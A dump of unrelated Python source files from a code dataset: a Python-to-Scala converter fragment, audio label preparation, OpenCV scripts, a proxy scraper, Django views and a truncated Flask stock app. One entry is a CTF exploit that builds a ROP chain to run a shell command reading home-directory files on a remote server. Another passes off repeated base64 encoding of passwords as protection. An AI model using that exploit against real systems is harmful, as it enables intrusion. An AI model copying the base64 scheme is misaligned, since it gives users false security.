is_self = varvar.startswith("self.") or varvar.startswith("cls.")
# An assignment rather than a += or whatever
is_assign = neweq.strip() == '='
# If this a Python-style variable assignment at class level? If so,
# it's a class var, and we will move it to the companion object
is_new_class_var = (not newvaldecl and is_assign and
dd.ty == 'class' and not is_self)
# If a class var, give it a 'cls.' prefix in the variable-assignment
# dictionary, so we can match later refs to the var. After this,
# 'varvar' is the name of the var as recorded in the vardict, but
# 'orig_varvar' is the actual name of the var in the text of the
# program.
orig_varvar = varvar
if is_new_class_var:
varvar = 'cls.' + varvar
# Don't add var/val to a self.foo assignment unless it's in an
# __init__() method (in which case it gets moved to class scope)
ok_to_var_self = is_self and dd.ty == 'def' and dd.name == '__init__'
curvardict = dd.vardict
if is_self:
# For a self.* variable, find the class vardict instead of the
# vardict of the current function.
i = len(defs) - 1
while i > 0 and defs[i].ty != 'class':
i -= 1
curvardict = defs[i].vardict
if newvaldecl:
# The text had an explicit var/val decl (Scala-style)
if varvar in curvardict:
warning("Apparent redefinition of variable %s" % varvar)
else:
# Signal not to try and change val to var
curvardict[varvar] = "explicit"
else:
# This is a Python-style variable (no declaration), or Scala-style
# assignment to existing variable.
#debprint("varvar: %s, curvardict: %s", varvar, curvardict)
if varvar not in curvardict:
if not is_assign:
# We saw 'foo += 1' or similar, but no previous assignment
# to 'foo'.
warning("Apparent attempt to modify non-existent variable %s" % varvar)
else:
# First time we see an assignment. Convert to a Scala
# declaration and record the number. We convert it to 'val',
# but we may go back later and change to 'var'.
curvardict[varvar] = len(lines)
if not is_self or ok_to_var_self:
bigline = "%sval %s%s%s%s" % (newindent, newvaldecl, orig_varvar, neweq, newrhs)
else:
# Variable is being reassigned, so change declaration to 'var'.
vardefline = curvardict[varvar]
if vardefline == "val":
warning("Attempt to set function parameter %s" % varvar)
elif type(vardefline) is int:
#debprint("Subbing var for val in [%s]", lines[vardefline])
lines[vardefline] = re.sub(r'^( *)val ', r'\1var ',
lines[vardefline])
if is_new_class_var:
# Bare assignment to variable at class level, without 'var/val'.
# This is presumably a Python-style class var, so move the
# variable (and preceding comments) to the companion object,
# creating one if necessary.
if dd.compobj_lineind is None:
# We need to create a companion object.
lines[dd.lineind:dd.lineind] = \
['%sobject %s {' % (' '*dd.indent, dd.name),
'%s}' % (' '*dd.indent),
'']
# This should adjust dd.lineind up by 3!
old_lineind = dd.lineind
adjust_lineinds(dd.lineind, 3)
assert dd.lineind == old_lineind + 3
dd.compobj_lineind = dd.lineind - 2
# Now move the variable assignment itself.
inslines = bigline.split('\n')
inspoint = dd.compobj_lineind
lines[inspoint:inspoint] = inslines
adjust_lineinds(inspoint, len(inslines))
curvardict[varvar] = inspoint
# Also move any blank or comment lines directly before.
bcomcount = zero_mismatch_prev_blank_or_comment_line_count
#debprint("Moving var %s, lineno=%s, bcomcount=%s",
# varvar, lineno, bcomcount)
if bcomcount > 0:
lines[inspoint:inspoint] = (
lines[-bcomcount:])
adjust_lineinds(inspoint, bcomcount)
del lines[-bcomcount:]
adjust_lineinds(len(lines)+1, -bcomcount)
bigline = None
if ok_to_var_self and bigline.strip().startswith('val '):
# If we've seen a self.* variable assignment in an __init__()
# function, move it outside of the init statement, along with
# any comments.
bigline = ' '*dd.indent + bigline.lstrip()
inslines = bigline.split('\n')
inspoint = dd.lineind
lines[inspoint:inspoint] = inslines
adjust_lineinds(inspoint, len(inslines))
if type(curvardict[varvar]) is int:
curvardict[varvar] = inspoint
bcomcount = zero_mismatch_prev_blank_or_comment_line_count
if bcomcount > 0:
# Move comments, but beforehand fix indentation
for i in xrange(bcomcount):
lines[-(i+1)] = re.sub(r'^( *)', ' '*dd.indent, lines[-(i+1)])
lines[inspoint:inspoint] = (
lines[-bcomcount:])
adjust_lineinds(inspoint, bcomcount)
del lines[-bcomcount:]
adjust_lineinds(len(lines)+1, -bcomcount)
bigline = None
break
# Store logical line or modified block-start line into lines[]
if bigline is None:
continue
if newblock:
startind = len(lines)
add_bigline(front + newblock + back)
indents += [Indent(startind, len(lines)-1, bigline_indent, "python")]
else:
add_bigline(bigline)
bigline = None
# At the end, output all lines
for line in lines:
print line
# Ignore blank line for purposes of figuring out indentation
# NOTE: No need to use \s* in these or other regexps because we call
# expandtabs() above to convert tabs to spaces, and rstrip() above to
# remove \r and \n
|
12,472 | 97490c9cd1108543f9ad3e0a0f3135697d111509 | # Module for preparing training labels,
# may also be run directly as a script
# Author: Nick Wilkinson 2021
import argparse
import numpy as np
import pandas as pd
import os
from voxseg import utils
def get_labels(data: pd.DataFrame, frame_length: float = 0.32, rate: int = 16000) -> pd.DataFrame:
'''Function for preparing training labels.
Args:
data: A pd.DataFrame containing datatset information and signals -- see docs for prep_data().
frame_length (optional): Length of a spectrogram feature in seconds. Default is 0.32.
rate (optional): Sample rate. Default is 16k.
Returns:
A pd.DataFrame containing labels and metadata.
'''
data = data.copy()
print('------------ Generating training labels -----------')
data['labels'] = data.apply(lambda x: _generate_label_sequence(x, frame_length, rate), axis=1)
data = data.drop(['signal', 'label'], axis=1)
data = data.dropna().reset_index(drop=True)
return data
def one_hot(col: pd.Series) -> pd.Series:
'''Function for converting string labels to one-hot encoded labels. One-hot mapping is done
in alphabetical order of sting labels eg. {a: [1, 0, 0], b = [0, 1, 0], c = [0, 0, 1]}.
Args:
col: A column of a pd.DataFrame containing label sequences generated by get_labels().
Returns:
A pd.Series containing the label sequences converted to one-hot encoding.
'''
unique = np.unique(np.hstack(col))
label_map = {}
for n, i in enumerate(unique):
temp = np.zeros(len(unique))
temp[n] = 1
label_map[i] = temp
return col.apply(lambda x: np.array([label_map[i] for i in x]))
def prep_data(path: str) -> pd.DataFrame:
'''Function for creating pd.DataFrame containing dataset information specified by Kaldi-style
data directory containing 'wav.spc', 'segments' and 'utt2spk'.
Args:
data_dir: The path to the data directory.
Returns:
A pd.DataFrame of dataset information. For example:
recording-id extended filename utterance-id start end label signal
0 rec_00 ~/Documents/test_00.wav utt_00 10 20 speech [-49, -43, -35...
1 rec_00 ~/Documents/test_00.wav utt_01 50 60 non_speech [-35, -23, -12...
2 rec_01 ~/Documents/test_01.wav utt_02 135 163 speech [25, 32, 54...
'''
wav_scp, segments, utt2spk = utils.process_data_dir(path)
assert utt2spk is not None and segments is not None, \
'ERROR: Data directory needs to contain \'segments\' and \'utt2spk\'\
containing label information.'
data = wav_scp.merge(segments).merge(utt2spk)
data = data.rename(columns={"speaker-id": "label"})
data = data.merge(utils.read_sigs(data))
return data
def _generate_label_sequence(row: pd.DataFrame, frame_length: float, rate: int) -> np.ndarray:
'''Auxiliary function used by get_labels(). Generated label arrays from a row of a pd.DataFrame
containing dataset information created by prep_data().
Args:
frame_length: Length of a spectrogram feature in seconds.
rate: Sample rate.
Returns:
An np.ndarray of labels.
'''
sig = row['signal']
if 'utterance-id' in row:
id = row['utterance-id']
else:
id = row['recording-id']
try:
assert len(range(0, int(len(sig)-1 - (frame_length+0.01) * rate), int(frame_length * rate))) > 0
labels = []
for _ in utils.progressbar(range(0, int(len(sig)-1 - (frame_length+0.01) * rate), int(frame_length * rate)), id):
labels.append(row['label'])
return np.array(labels)
except AssertionError:
pass
# Handle args when run directly
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='prep_labels.py',
description='Prepare labels for model training.')
parser.add_argument('data_dir', type=str,
help='a path to a Kaldi-style data directory containting \'wav.scp\', \'segments\', and \'utt2spk\'')
parser.add_argument('out_dir', type=str,
help='a path to an output directory where labels and metadata will be saved as labels.h5')
args = parser.parse_args()
data = prep_data(args.data_dir)
labels = get_labels(data)
labels['labels'] = one_hot(labels['labels'])
if not os.path.exists(args.out_dir):
print(f'Directory {args.out_dir} does not exist, creating it.')
os.mkdir(args.out_dir)
utils.save(labels, f'{args.out_dir}/labels.h5') |
12,473 | d8b836c796a311da7fb7f4ecafce0b60cfcf6e7e | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import * # pip install pwntools
context.arch = "amd64"
key = randoms(8)
def checksum(data):
s = 0
for c in data:
s ^= ord(c)
return s
def Send(data):
p = p32(len(data) + 10)
p += key
p += data + "\x00"
p += chr(checksum(key + data))
r.send(p)
def Recv():
size = u32(r.recv(4))
data = r.recv(size)[8:]
return data[:-1]
if args.REMOTE:
r = remote("35.233.98.21", 4242)
else:
r = remote("mlwr-part1.ctfcompetition.com", 1234)
data = "A" * 1320 + "\0"
context.log_level = 'debug'
# print(sys.argv[1])
p = p32(8) + key + data
p += '\x00' * 7
# p += p64(0x404166) * 8
p += p64(0) * 3
# 0x40a101 : pop rax ; pop rcx ; pop rdx ; pop rsi ; pop rdi ; call rax
# 0x0000000000408108 : pop rax ; ret
# 0x0000000000400b18 : pop rbp ; ret
# 0x00000000004093e1 : mov qword ptr [rbp - 0x10], rax ; mov rax, qword ptr [rbp - 0x10] ; shr rax, 0x20 ; xor eax, dword ptr [rbp - 4] ; pop rbp ; ret
# 0x400A81, # rax = send
pop_rax = 0x408108
pop_rbp = 0x400b18
pop_rdi = 0x000000000040aeb3
pop_rsi_15 = 0x000000000040aeb1
set_b = 0x4093e1
buf = 0x60c800
get = 0x4097fa
dynamic = 0x40a0e7
libc_base = 0x7f1b8014f630 - 0x20630
system = libc_base + 0x41100
p += flat(
pop_rax, "exec 1>&", pop_rbp, buf+0x10, set_b, buf + 0x10 + 8,
pop_rax, "4;cd /ho", set_b, buf + 0x10 + 8 * 2,
pop_rax, "me/`whoa", set_b, buf + 0x10 + 8 * 3,
pop_rax, "mi`;ls -", set_b, buf + 0x10 + 8 * 4,
pop_rax, "a;cat f*", set_b, buf + 0x10 + 8 * 5,
pop_rdi, buf,
system
)
# p += flat(
# pop_rax,
# "system\x00\x00",
# pop_rbp,
# buf + 0x10,
# set_b, buf+8+0x10, # next rbp
# pop_rax,
# "ls 1>&4".ljust(8, "\x00"),
# set_b, 0,
# pop_rdi, buf,
# pop_rsi_15, buf + 8, 0,
# pop_rax, 0,
# pop_rdi, 0x7f1b8021ce30,
# pop_rsi_15, buf, 0,
# # get,
# # 0x000000000040a105, # pop rdi ; call rax
# # buf + 8,
# # dynamic,
# 0x40a101,
# 0x400a81,
# 0, 0x100, buf, 4,
# )
# + p64(0x60c300) + p64(0x408e91)
p += ('\x00' + '\x00' * 7) * (0x3200 / 8)
# p += chr(int(sys.argv[1]))
# p += chr(checksum(key + data))
r.send(p)
r.shutdown()
r.stream() # interactive()
# CTF{~~~APT warz: teh 3mpire pwns b4ck~~~}
|
12,474 | d2d12c328a7a777d935e3ee3a88f6a22c890ab08 | import cv2
image = cv2.imread('static/extraCardTemplates/ActionAttack.png')
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# play with these numbers
blur = cv2.GaussianBlur(gray, (5, 5), 0)
thresh = cv2.adaptiveThreshold(blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 15, 30)
# cv2.imwrite("suggestions.jpg", thresh)
# Dilate to combine adjacent text contours
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (10, 10))
dilate = cv2.dilate(thresh, kernel, iterations=4)
# Find contours, highlight text areas, and extract ROIs
cnts = cv2.findContours(dilate, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if len(cnts) == 2 else cnts[1]
for c in cnts:
area = cv2.contourArea(c)
if area > 50:
x, y, w, h = cv2.boundingRect(c)
cv2.rectangle(image, (x, y), (x + w, y + h), (36, 255, 12), 2)
cv2.imwrite("suggestions.jpg", image)
|
12,475 | afb8249e7f262c6270ae556ac2910a14267929d3 | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 26 12:16:20 2020
@author: chelsea
"""
def load_raw_data(input_folder, save_folder):
import numpy as np
from pathlib import Path
import pickle
import os
from Raw_Data_Class import raw_data as RDC
raw_data = RDC()
folder = Path(input_folder)
data = np.loadtxt(open(folder / 'data.csv', 'rb'), delimiter = ',')
time = np.loadtxt(open(folder / 'time.csv', 'rb'), delimiter = ',')
energy = np.loadtxt(open(folder / 'energy.csv', 'rb'), delimiter = ',')
raw_data.change_value(energy = energy, time = time, data_matrix = data)
raw_data.load_path = folder
save_DIR = Path(save_folder) / 'rawdata.pkl'
if not os.path.isdir(Path(save_folder)):
os.mkdir(Path(save_folder))
with open(save_DIR, 'wb') as f:
pickle.dump(raw_data,f)
return raw_data
|
12,476 | b2b2e1843657383b3e9baf3491a1707e7089d3b4 | from __future__ import division
from ..errors import UndefinedDistributionError
from .base import UncertaintyBase
from numpy import repeat, tile
class UndefinedUncertainty(UncertaintyBase):
"""Undefined or unknown uncertainty"""
id = 0
description = "Undefined or unknown uncertainty"
@classmethod
def random_variables(cls, params, size, seeded_random=None):
return repeat(params['loc'], size).reshape((params.shape[0],
size))
@classmethod
def cdf(cls, params, vector):
raise UndefinedDistributionError(
"Can't calculate percentages for an undefined distribution.")
@classmethod
def ppf(cls, params, percentages):
return tile(params['loc'].reshape((params.shape[0], 1)),
percentages.shape[1])
class NoUncertainty(UndefinedUncertainty):
id = 1
description = "No uncertainty"
|
12,477 | aade96e2904344381b47ba20e7f7f1366f6db75e | """
given a string, s, return the "reversed" string where all characters that are
not a letter stay in the same place, and all letters reverse their positions.
exmaple:
input: "ab-cd"
output: "dc-ba"
input: "a-bC-dEF-ghIj"
output: "j-Ih-gfE-dCba"
"""
def reverse_only_chars(s):
# strings are immutable so we need to create an easy way to swap elements (an array)
char_array = []
# store the indices of the characters of the input string
index_array = []
# iterate through the string and populate the two arrays with their values.
for i, char in enumerate(s):
if char.isalpha():
index_array.append(i)
char_array.append(char)
# intialize two pointers for the index_array
i = 0
j = len(index_array) - 1
# iterate through the index array from front and back with two pointers.
# swap the values that the pointers point to in the char_array
while i < j:
low_index = index_array[i]
high_index = index_array[j]
char_array[low_index], char_array[high_index] = char_array[high_index], char_array[low_index]
i+=1
j-=1
# return a string of the reversed character word.
# the non-alpha characters will remain in the same place.
return "".join(char_array)
s = "ab-cd" # "dc-ba"
s = "a-bC-dEF-ghIj" # "j-Ih-gfE-dCba"
print(reverse_only_chars(s))
|
12,478 | 7fe5ec74f70ce3b4f6721df9e881af19718f8769 | import os
import curses
curses.endwin()
startDir = os.getcwd()
os.system("clear")
print(f"To return to the semi-graphical terminal windowing system, type: 'exit'")
os.system("bash")
os.chdir(startDir)
|
12,479 | 93d6481146afa1280c17a9131a44b57b9958d96e |
from html.parser import HTMLParser
import random
import time
from GetLocalHtml import getLocalWebHtml
from GetProxyWebHtml import getProxyWebHtml
#获得hidemyname代理前三页的高匿ip、端口、协议
def getHidemynameProxies():
proxyList=[]
myParser=MyHidemynameParser()
for hidemynamePage in range(0,3): #抓取1-3页
# html=getLocalWebHtml('hidemynameLocalHtml.txt') #测试时为了避免多次访问代理网站,所以从一个本地页面读取ip
html=getProxyWebHtml('https://www.hidemyname.biz/proxy-list/?type=h&anon=234&start=%s#list'%(hidemynamePage*64))
myParser.feed(html)
proxyList.extend(myParser.resultList)
myParser.resultList=[] #一直使用同一个MyXiciParser对象,所以处理完一个页面后需要清空
sleepAwhile('Hide my name代理')
return proxyList
#每次从代理网站取得html时睡眠随机时间,避免瞬间高频访问服务器。proxySite参数是代理网站的名称,print()时方便辨识
def sleepAwhile(proxySite):
sleepTime=random.uniform(3,6)
print("抓取完成一个《%s》页面,睡眠%s秒"%(proxySite,sleepTime))
time.sleep(sleepTime)
#HTMLParser,解析西刺代理网站页面,筛出协议、ip、端口。html大体结构是一个table含多行信息,每行第2列是ip,第3列是端口,第6列是协议
class MyHidemynameParser(HTMLParser):
resultList=[] #存放整页多条ip、端口、协议的数据
proxyData=[] #存放一行的ip、端口、协议
enterIP=0
enterPort=0
def handle_starttag(self,tag,attrs):
if tag=='td' and attrs:
for (key,value) in attrs:
if key=='class' and value=='tdl':
self.enterIP=1
elif tag=='td' and self.enterIP==1:
self.enterPort=1
def handle_endtag(self,tag):
pass
def handle_data(self,data):
if self.enterIP==1 and self.enterPort==0:
self.proxyData.append(data)
elif self.enterPort==1:
self.proxyData.append(data)
self.proxyData.append('http')
self.resultList.append(self.proxyData)
self.proxyData=[]
self.enterIP=0
self.enterPort=0
if __name__=='__main__':
proxyList=getHidemynameProxies() #只能抓前三页
for item in proxyList:
print(item)
print('done') |
12,480 | fefc8456fc6ee7af0bf1915a32441ed717d2b9f5 | import os,sys
import base64
class Directory(object):
def startDir(self):
if not os.path.isdir(os.path.expanduser('~') + "/.CowNewsReader"):
if os.system("mkdir " + os.path.expanduser('~') + "/.CowNewsReader"):
print "Error: Couldn't create directory"
sys.exit(1)
if not os.path.isdir(os.path.expanduser('~') + "/.CowNewsReader/images"):
if os.system("mkdir " + os.path.expanduser('~') + "/.CowNewsReader/images"):
print "Error: Couldn't create directory"
sys.exit(1)
if not os.path.isfile(os.path.expanduser('~') + "/.CowNewsReader/pref.txt"):
os.system("touch " + os.path.expanduser('~') + "/.CowNewsReader/pref.txt")
if not os.path.isfile(os.path.expanduser('~') + "/.CowNewsReader/pwd.txt"):
os.system("touch " + os.path.expanduser('~') + "/.CowNewsReader/pwd.txt")
if not os.path.isfile(os.path.expanduser('~') + "/.CowNewsReader/read.txt"):
os.system("touch " + os.path.expanduser('~') + "/.CowNewsReader/read.txt")
def saveUserInfo(self, name, pwd):
try:
f = open(os.path.expanduser('~') + "/.CowNewsReader/pwd.txt", 'w')
nm = f.softspace
except IOError, e:
print e
sys.exit(0)
enName = base64.b64encode(name[1:])
enPwd = base64.b64encode(pwd)
pd = int(base64.b64decode(enName))%10
for i in xrange(nm):
enName = base64.b64encode(enName)
for i in xrange(pd):
enPwd = base64.b64encode(enPwd)
f.write(enName+"\n")
f.write(enPwd)
f.close()
def readUserInfo(self):
try:
f = open(os.path.expanduser('~') + "/.CowNewsReader/pwd.txt", 'r')
except IOError, e:
print e
sys.exit(0)
nro = base64.b64decode(f.readline().strip("\n"))
pso = base64.b64decode(f.readline().strip("\n"))
for i in xrange(int(nro)%10):
pso = base64.b64decode(pso)
return ('e'+nro,pso)
|
12,481 | 5de4f225fd7a5254dd076ea2021ca1f0053c5ade | from django.http import Http404
from django.shortcuts import render, get_object_or_404, redirect
from .models import Product
from .forms import ProductCreateForm, RawProductForm
# Create your views here.
# def product_create_view(request):
# if request.method == 'POST':
# my_form = RawProductForm(request.POST)
# if my_form.is_valid():
# # now the data is good
# print(my_form.cleaned_data)
# Product.objects.create(**my_form.cleaned_data)
# else:
# print(my_form.errors)
# else:
# my_form = RawProductForm()
# context = {
# 'form': my_form
# }
# return render(request, 'products/create.html', context)
# def render_initial_data(request):
# initial_data = {
# 'title': 'Initial Title',
# 'price': 2.5,
# 'mrp': 3,
# 'featured': True
# }
# form = RawProductForm(request.POST or None, initial=initial_data)
# context = {
# 'form': form
# }
# return render(request, '', context)
# def render_database_data(request):
# product = Product.objects.get(id=3)
# form = RawProductForm(request.POST or None, instance=product)
# if form.is_valid():
# form.save() # We are able to use this method because form is instance of database object
# context = {
# 'form': form
# }
# return render(request, '', context)
# def handling_object_404(request, my_id):
# # 1st way
# obj = get_object_or_404(Product, id=id)
# # 2nd way
# try:
# obj = Product.objects.get(id=my_id)
# except Product.DoesNotExist:
# raise Http404
# context = {
# 'object': obj
# }
# return render(request, '', context)
# def product_delete_view(request, my_id):
# '''
# # view to confirm delete i.e. if this given form is submitted then we delete object
# <form action='.' method='POST'>
# <h1>Do you want to delete the product "{{ object.title }}"?</h1>
# <p>
# <input type='submit' value='Yes' />
# <a href='../'>Cancel</a>
# </p>
# </form>
# '''
# obj = get_object_or_404(Product, id=my_id)
# if request.method == 'POST':
# # confirming delete
# obj.delete()
# return redirect('../')
# context = {
# 'object': obj
# }
# return redirect(request, '', context)
def product_create_view(request):
form = ProductCreateForm(request.POST or None)
if form.is_valid():
form.save()
form = ProductCreateForm()
context = {
'form': form
}
return render(request, 'products/create.html', context)
def product_detail_view(request):
product = Product.objects.get(id=1)
context = {
'object': product
}
return render(request, 'products/detail.html', context)
|
12,482 | f2f251fda5d9222cc21d8ce34ca045d0af609394 | #based on https://medium.com/bilesanmiahmad/how-to-upload-a-file-to-amazon-s3-in-python-68757a1867c6
#https://stackoverflow.com/questions/8637153/how-to-return-images-in-flask-response
#https://stackoverflow.com/questions/18908426/increasing-client-max-body-size-in-nginx-conf-on-aws-elastic-beanstalk
#https://medium.com/@marilu597/getting-to-know-and-love-aws-elastic-beanstalk-configuration-files-ebextensions-9a4502a26e3c
#https://stackoverflow.com/questions/40336918/how-to-write-a-file-or-data-to-an-s3-object-using-boto3
#https://towardsdatascience.com/object-detection-with-less-than-10-lines-of-code-using-python-2d28eebc5b11
import cv2
import cvlib as cv
from cvlib.object_detection import draw_bbox
def determine(eachObject, centerx, centery): # (x1, y1, x2, y2). x1 and y1 refers to the lowerleft corner
#and x2 and y2 refers to the upperright corner.
if (eachObject[0] <= centerx <= eachObject[2]):
if (eachObject[1] <= centery <= eachObject[3]):
return True
return False
im = cv2.imread("input.jpg")
h, w, c = im.shape
centerx = w/2
centery = h/2
bbox, label, conf = cv.detect_common_objects(im)
finallist = [x for x in bbox if determine(x,centerx,centery)]
if (len(finallist) > 0):
left = finallist[0][0]
top = finallist[0][1]
right = finallist[0][2]
bottom = finallist[0][3]
im1 = im[top:bottom, left:right]
cv2.imwrite("output.jpg",im1)
|
12,483 | 604f7fa74876aa8cab6fcfe1aa8d481974381b56 | #薪水和学历的关系图
import pandas as pd
import numpy as np
df = pd.DataFrame(pd.read_csv("../../data/data.csv",encoding='gbk'))
'''
去掉异常值数据
'''
df = df[df['education'] != '3个月']
df = df[df['education'] != '4个月']
df = df[df['education'] != '6个月']
df = df[df['education'] != '中专/中技']
df = df[df['lowSalary'] != '200/天']
df = df[df['lowSalary'] != '300/天']
df = df[df['lowSalary'] != '160/天']
'''
通过对数据的处理,获取到每个职位的平均薪水
'''
salary = []
for x,y in zip(df['highSalary'],df['lowSalary']):
salary.append((x + int(y[0:y.index('K')]))/2)
#插入一列数据
df['salary'] = salary
print(pd.pivot_table(df,values=['salary'],columns=['education'],aggfunc=[np.mean]).unstack()) |
12,484 | cabba2cde718fc81e2c3df92c45869f585b6c7a9 | import scannerpy
import scannertools as st
import os
from django.db.models import Q
from query.models import Video, Frame, Face, Labeler, Tag, VideoTag
from esper.prelude import Notifier
import json
from tqdm import tqdm
# Faces were computed at this many FPS
FACE_FPS = 2
def frames_to_detect_faces(microshot_boundaries, video):
# Detect faces FACE_FPS times a second
sampling_rate = int(round(video.fps) / FACE_FPS)
frames = set(range(0, video.num_frames, sampling_rate))
# Detect faces at every microshot boundary
frames = frames.union(set(microshot_boundaries))
# Also detect faces the frame before every microshot boundary
frames = frames.union(set([boundary - 1
for boundary in microshot_boundaries
if boundary > 0]))
return sorted(list(frames))
TAG, _ = Tag.objects.get_or_create(name="face_computed")
# Get all the videos that haven't been labeled with this pipeline
ids_to_exclude = set([36, 122, 205, 243, 304, 336, 455, 456, 503])
all_videos = set([video.id for video in Video.objects.all()])
video_ids=sorted(list(all_videos.difference(ids_to_exclude)))
print(video_ids, len(video_ids))
videos = Video.objects.filter(id__in=video_ids).order_by('id').all()
db = scannerpy.Database()
print("Loading histograms from Scanner")
# Make sure the histograms have been computed already!
hsv_histograms = st.histograms.compute_hsv_histograms(
db,
videos=[video.for_scannertools() for video in list(videos)]
)
for idx, hist in enumerate(hsv_histograms):
if hist is None:
print(videos[idx].id, 'is None')
#hsv_histograms_loaded = [hist.load() for hist in tqdm(hsv_histograms)]
print("Loading microshot boundaries")
# Compute microshot boundaries
microshot_boundaries = st.shot_detection.compute_shot_boundaries(
db,
videos=[video.for_scannertools() for video in list(videos)],
histograms=hsv_histograms
)
bad_boundaries = []
for idx, boundaries in enumerate(microshot_boundaries):
if boundaries is None or boundaries is []:
bad_boundaries.append(videos[idx].id)
print("{} movies fail on boundary detection".format(bad_boundaries))
print("Computing frames to compute on")
# Compute frames FACE_FPS times a second and before and after every microshot
# boundary
frames = [
frames_to_detect_faces(list(boundaries), video)
for boundaries, video in zip(microshot_boundaries, videos)
]
print("Saving frames to database")
frames_in_db_already = set([
(f.video_id, f.number)
for f in Frame.objects.filter(tags=TAG).all()
])
# Put frame objects in database
new_frames = []
for video, framelist in tqdm(zip(videos, frames), total=len(videos)):
frames_existing = set([f.number for f in Frame.objects.filter(video_id=video.id)])
new_frames += [
Frame(video=video, number=num)
for num in framelist
if num not in frames_existing
]
Frame.objects.bulk_create(new_frames)
print("Saving frame tags to database")
# Tag all the frames as being labeled
new_frame_tags = []
for video, framelist in tqdm(zip(videos, frames), total=len(videos)):
frame_objs = Frame.objects.filter(video_id=video.id).filter(number__in=framelist)
frame_obj_nums = set([f.number for f in frame_objs])
if frame_objs.count() != len(framelist):
print('Not all frames in Database for video {}'.format(video.id))
print('{} frames in DB, {} frames wanted'.format(len(frame_obj_nums), len(framelist)))
for frame in frame_objs:
new_frame_tags.append(
Frame.tags.through(frame_id=frame.pk, tag_id=TAG.pk))
Frame.tags.through.objects.bulk_create(new_frame_tags, batch_size=100000)
|
12,485 | 008bdb99b6415b4c3270cf94d5e15e1a0ccbd3a0 | import os
from cs50 import SQL
from flask import Flask, flash, jsonify, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
from werkzeug.security import check_password_hash, generate_password_hash
from datetime import datetime
from pytz import timezone
from helpers import apology, login_required, lookup, usd
# Configure application
app = Flask(__name__)
# Ensure templates are auto-reloaded
app.config["TEMPLATES_AUTO_RELOAD"] = True
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# Custom filter
app.jinja_env.filters["usd"] = usd
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# Configure CS50 Library to use SQLite database
db = SQL("sqlite:///finance.db")
@app.route("/")
@login_required
def index():
"""Show portfolio of stocks"""
# User reached route via GET (as by clicking a link or via redirect)
if request.method == "GET":
# FORM TABLE total SELECT name for lookup(name) of now price, price, total costmoney ,totalshares
portf = db.execute("SELECT name, symbol, price, sharesTotal, costmoneyTotal FROM total WHERE userID = :userID", userID=session["user_id"])
# Len of portf list, rows
porLen = len(portf)
# For loop portf index "nowPrice" to new dict, costmoneyTotal
for item in range(porLen):
e = portf[item]["symbol"]
nowPrice = lookup(e).get("price")
portf[item]['nowPrice'] = nowPrice
portf[item]['costmoneyTotal'] = usd(portf[item]['costmoneyTotal'])
# List reversed
portf = list(reversed(portf))
# FORM TABLE users SELECT end cash
endPrice = db.execute("SELECT cash FROM users WHERE id = :userID", userID=session["user_id"])
endPrice = usd(endPrice[0]["cash"])
return render_template("index.html", portf=portf, endPrice = endPrice, porLen=porLen)
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock"""
# User reached route via GET (as by clicking a link or via redirect)
if request.method == "GET":
return render_template("buy.html")
else:
symbol = request.form.get("symbol")
if not symbol:
return apology("must provide symbol", 400)
# Check if symbol exist in lookup(symbol)
symbol = lookup(symbol)
if not symbol :
return apology("symbol doesn't exist,sorry", 400)
else:
name = symbol.get("name")
price = symbol.get("price")
symbol = symbol.get("symbol")
# Check if shares of name is a integer
shares = request.form.get("shares")
# https://www.geeksforgeeks.org/program-check-input-integer-string/
n = len(shares)
for i in range(n) :
if shares[i].isdigit() != True :
return apology("shares need to be a number", 400)
shares = int(shares)
# if positive number
if shares > 0:
# Query database for user's cash
cash = db.execute("SELECT cash FROM users WHERE id = :userID",
userID=session["user_id"])
# Get cash
cash = cash[0]["cash"]
# Check user if have enough money
buyNeed = shares*price
if cash > buyNeed:
# Update csah in users TABLE
db.execute("UPDATE users SET cash = :cash WHERE id = :userID", cash=cash-buyNeed, userID=session["user_id"])
# Check purchase time
now = datetime.now(timezone('Asia/Shanghai'))
# Add to buy table
db.execute("INSERT INTO buy (date, symbol, name, price, shares, costmoney, userID) VALUES (:date, :symbol, :name, :price, :shares, :costmoney, :userID)",
date=now, symbol=symbol, name=name, price=price, shares=shares, costmoney=buyNeed, userID=session["user_id"])
# Add to buy-sell table
db.execute("INSERT INTO bs (symbol, price, shares, date, userID) VALUES (:symbol, :price, :shares, :date, :userID)", symbol=symbol, price=usd(price), shares=shares, date=now, userID=session["user_id"])
# Count finally cash
endCash=cash-buyNeed
# Count total shares and costmoney by buy
sharesTotal = db.execute("SELECT shares FROM buy WHERE userID = :userID and name = :name", userID=session["user_id"], name=name)
costmoneyTotal = db.execute("SELECT costmoney FROM buy WHERE userID = :userID and name = :name", userID=session["user_id"], name=name)
# len(sharesTotal)
st = len(sharesTotal)
# Sum shares
sumItem = 0
for item in range(st):
sumItem = sharesTotal[item]["shares"] + sumItem
sharesTotal_2 = sumItem
# Sum cost money
sumItem2 = 0
for item2 in range(st):
sumItem2 = costmoneyTotal[item2]["costmoney"] + sumItem2
costmoneyTotal_2 = sumItem2
# Ensure return total number and totalGet by sell
sharesTotalSell = db.execute("SELECT shares FROM sell WHERE userID = :userID and name = :name", userID=session["user_id"], name=name)
costmoneyTotalSell = db.execute("SELECT totalGet FROM sell WHERE userID = :userID and name = :name", userID=session["user_id"], name=name)
# Len of sharesTotalSell
stS = len(sharesTotalSell)
# Sum of sell shares
sumItem3 = 0
for item3 in range(stS):
sumItem3 = sharesTotalSell[item3]["shares"] + sumItem3
# Buy - sell shares
sharesTotal_2 = sharesTotal_2-sumItem3
# Sum of sell totalGet
sumItem4 = 0
for item4 in range(stS):
sumItem4= costmoneyTotalSell[item4]["totalGet"] + sumItem4
# Buy -sell totalGet
